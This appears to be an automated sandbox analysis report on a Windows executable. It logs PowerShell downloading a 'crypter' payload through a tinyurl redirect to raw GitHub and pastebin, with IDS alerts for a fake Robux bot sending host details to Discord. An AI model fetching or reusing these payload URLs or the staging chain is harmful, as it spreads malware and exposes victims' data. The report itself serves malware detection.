                                            TLSH:15B21B0063E8CB2AD9FE9F7FB672104406F2F701752AE7481C8C169F5DA7B8412927B6
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...8.z..........."...0..V............... .....@..... ....................................`...@......@............... .....

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x140000000
                                            Entrypoint Section:
                                            Digitally signed:false
                                            Imagebase:0x140000000
                                            Subsystem:windows cui
                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0xDE7ACC38 [Mon Apr 12 06:27:04 2088 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:

                                            Entrypoint Preview

                                            Instruction
                                            dec ebp
                                            pop edx
                                            nop
                                            add byte ptr [ebx], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax+eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x53c.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x74740x54.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x557b0x56001dc5ea34b3ebce2db01f3a0796c01cf6False0.5027707122093024data5.926880250428821IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x80000x53c0x60000487c284a2288bcdf1d846d78b7107fFalse0.3873697916666667data3.880372350124212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x80900x2acdata0.4283625730994152
                                            RT_MANIFEST0x834c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-15T16:08:33.538671+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.849713162.159.136.232443TCP
                                            2024-10-15T16:08:45.790087+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.849718162.159.136.232443TCP
                                            2024-10-15T16:08:53.748074+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.849719162.159.136.232443TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 15, 2024 16:08:10.226421118 CEST4970480192.168.2.8104.18.111.161
                                            Oct 15, 2024 16:08:10.231345892 CEST8049704104.18.111.161192.168.2.8
                                            Oct 15, 2024 16:08:10.231426001 CEST4970480192.168.2.8104.18.111.161
                                            Oct 15, 2024 16:08:10.242575884 CEST4970480192.168.2.8104.18.111.161
                                            Oct 15, 2024 16:08:10.248711109 CEST8049704104.18.111.161192.168.2.8
                                            Oct 15, 2024 16:08:10.915129900 CEST8049704104.18.111.161192.168.2.8
                                            Oct 15, 2024 16:08:10.915235996 CEST8049704104.18.111.161192.168.2.8
                                            Oct 15, 2024 16:08:10.915283918 CEST4970480192.168.2.8104.18.111.161
                                            Oct 15, 2024 16:08:11.061182022 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.061233997 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:11.061290979 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.168608904 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.168662071 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:11.790503025 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:11.790591002 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.797379017 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.797401905 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:11.797645092 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:11.848702908 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.857886076 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:11.903403044 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.056781054 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.056844950 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.056871891 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.056888103 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:12.056910038 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.056952953 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:12.056961060 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.057329893 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.057377100 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:12.057385921 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.064913988 CEST44349705185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:12.065000057 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:12.341115952 CEST49705443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:29.644877911 CEST4970980192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:29.649795055 CEST8049709104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:29.649872065 CEST4970980192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:29.686963081 CEST4970980192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:29.691802979 CEST8049709104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.254349947 CEST8049709104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.256711006 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.256736040 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.256819010 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.261219025 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.261234045 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.301785946 CEST4970980192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.891625881 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.891715050 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.895194054 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.895205021 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.895616055 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:30.903321981 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:30.947397947 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:31.053970098 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:31.054091930 CEST44349710104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:31.054184914 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:31.066390038 CEST49710443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:31.080151081 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.084996939 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.086859941 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.087018967 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.091831923 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.690565109 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.690794945 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.691523075 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.691600084 CEST4971180192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.692914963 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.693015099 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.693099976 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.693384886 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:31.693416119 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:31.695643902 CEST8049711185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.317783117 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.317862034 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.320508003 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.320514917 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.320844889 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.322027922 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.367404938 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540106058 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540215969 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540249109 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540294886 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.540304899 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540340900 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540364027 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.540397882 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.540450096 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.540462017 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.548455954 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.548546076 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.580157995 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.697130919 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:32.697185993 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:32.697257042 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:32.697650909 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:32.697664976 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.314784050 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.314893007 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.316601992 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.316610098 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.317023993 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.318551064 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.359400034 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.359450102 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.359457970 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.538710117 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.538806915 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.538870096 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.551067114 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.654927015 CEST4970480192.168.2.8104.18.111.161
                                            Oct 15, 2024 16:08:37.417275906 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:37.422364950 CEST8049714104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:37.422460079 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:37.423155069 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:37.428107977 CEST8049714104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.044130087 CEST8049714104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.046175003 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.046230078 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.046490908 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.050937891 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.050956011 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.098603010 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.678014994 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.678102016 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.681592941 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.681598902 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.681829929 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.687745094 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.731452942 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:39.070935965 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:39.071185112 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:39.071301937 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:39.136986971 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:39.156378031 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.161555052 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.162822008 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.162990093 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.168090105 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.761147022 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.761382103 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762300014 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762346983 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.762412071 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.762434006 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762456894 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762689114 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762706041 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.766299963 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.398885012 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.399012089 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.400712013 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.400736094 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.400976896 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.402041912 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.443433046 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.528805971 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529017925 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529068947 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.529093027 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529195070 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529238939 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.529246092 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529335976 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529378891 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.529385090 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.537163973 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.537223101 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.552414894 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:44.958748102 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:44.958798885 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:44.958878040 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:44.959382057 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:44.959400892 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.567783117 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.568042994 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.569214106 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.569232941 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.569652081 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.570561886 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.615403891 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.615473032 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.615489006 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.790143967 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.790303946 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.790360928 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.792301893 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:50.807578087 CEST4970980192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:52.905277014 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:52.905317068 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:52.905399084 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:52.905875921 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:52.905888081 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.510710955 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.510879040 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.512633085 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.512641907 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.512923956 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.514050961 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.559413910 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.559657097 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.559667110 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.748075008 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.748151064 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.748259068 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.751095057 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:58.890331984 CEST4971480192.168.2.8104.20.4.235

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 15, 2024 16:08:10.199893951 CEST5740753192.168.2.81.1.1.1
                                            Oct 15, 2024 16:08:10.207844973 CEST53574071.1.1.1192.168.2.8
                                            Oct 15, 2024 16:08:10.977130890 CEST5514653192.168.2.81.1.1.1
                                            Oct 15, 2024 16:08:10.984246969 CEST53551461.1.1.1192.168.2.8
                                            Oct 15, 2024 16:08:29.613161087 CEST6538153192.168.2.81.1.1.1
                                            Oct 15, 2024 16:08:29.620660067 CEST53653811.1.1.1192.168.2.8
                                            Oct 15, 2024 16:08:32.688678980 CEST5646053192.168.2.81.1.1.1
                                            Oct 15, 2024 16:08:32.696599960 CEST53564601.1.1.1192.168.2.8

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 15, 2024 16:08:10.199893951 CEST192.168.2.81.1.1.10x32bdStandard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:10.977130890 CEST192.168.2.81.1.1.10xa8e1Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:29.613161087 CEST192.168.2.81.1.1.10x8038Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:32.688678980 CEST192.168.2.81.1.1.10xe76aStandard query (0)discord.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 15, 2024 16:08:10.207844973 CEST1.1.1.1192.168.2.80x32bdNo error (0)tinyurl.com104.18.111.161A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:10.207844973 CEST1.1.1.1192.168.2.80x32bdNo error (0)tinyurl.com104.17.112.233A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:10.984246969 CEST1.1.1.1192.168.2.80xa8e1No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:10.984246969 CEST1.1.1.1192.168.2.80xa8e1No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:10.984246969 CEST1.1.1.1192.168.2.80xa8e1No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:10.984246969 CEST1.1.1.1192.168.2.80xa8e1No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:29.620660067 CEST1.1.1.1192.168.2.80x8038No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:29.620660067 CEST1.1.1.1192.168.2.80x8038No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:29.620660067 CEST1.1.1.1192.168.2.80x8038No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:32.696599960 CEST1.1.1.1192.168.2.80xe76aNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:32.696599960 CEST1.1.1.1192.168.2.80xe76aNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:32.696599960 CEST1.1.1.1192.168.2.80xe76aNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:32.696599960 CEST1.1.1.1192.168.2.80xe76aNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                            Oct 15, 2024 16:08:32.696599960 CEST1.1.1.1192.168.2.80xe76aNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • raw.githubusercontent.com
                                            • pastebin.com
                                            • discord.com
                                            • tinyurl.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.849704104.18.111.161803364C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:08:10.242575884 CEST164OUTGET /bdhpvpny HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: tinyurl.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:10.915129900 CEST1236INHTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:08:10 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt
                                            Referrer-Policy: unsafe-url
                                            X-Robots-Tag: noindex
                                            X-TinyURL-Redirect-Type: redirect
                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                            X-TinyURL-Redirect: eyJpdiI6IjZyYmpuSE9zNTFHTHlIS3BHZkgwVWc9PSIsInZhbHVlIjoiZEtOWVVJdC9HZnBsR25DZGswcU93bDV3NHh0bFVzVkhYakJVZ245eEtIelRUOURZc1hRcjRLNVBoNTFMdDlmVnMzcFNlOXd1V2JSRzZtbDlMTlQ0Tmc9PSIsIm1hYyI6IjU4MDVkMjY3NTNlMTA5NzUxZTQ5MmE4ZGYxNDE1MDRhMTk4Y2M1NWFlNWExYjYwZWFlN2NkNWE4ZWQzYzU0MGEiLCJ0YWciOiIifQ==
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            CF-Cache-Status: HIT
                                            Set-Cookie: __cf_bm=UIYJqhLoc_nc8sSbmqYdSsBK_DZLBKpHea9WUwdu2kM-1729001290-1.0.1.1-8E13KOCqDp.Fs.xxAiQIH_bX..sYZpWn8ojcQT8dLjGS_eE1zCK1biE5eefdBYhDl_FRevIdjvP3q5XlI14vrw; path=/; expires=Tue, 15-Oct-24 14:38:10 GMT; domain=.tinyurl.com; HttpOnly
                                            Server: cloudflare
                                            CF-RAY: 8d3061336a5b6c7f-DFW
                                            alt-svc: h3=":443"; ma=86400
                                            Data Raw: 32 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d
                                            Data Ascii: 272<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <m
                                            Oct 15, 2024 16:08:10.915235996 CEST556INData Raw: 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f
                                            Data Ascii: eta http-equiv="refresh" content="0;url='https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt'" /> <title>Redirecting to https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawer


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.849709104.20.4.235805632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 15, 2024 16:08:29.686963081 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
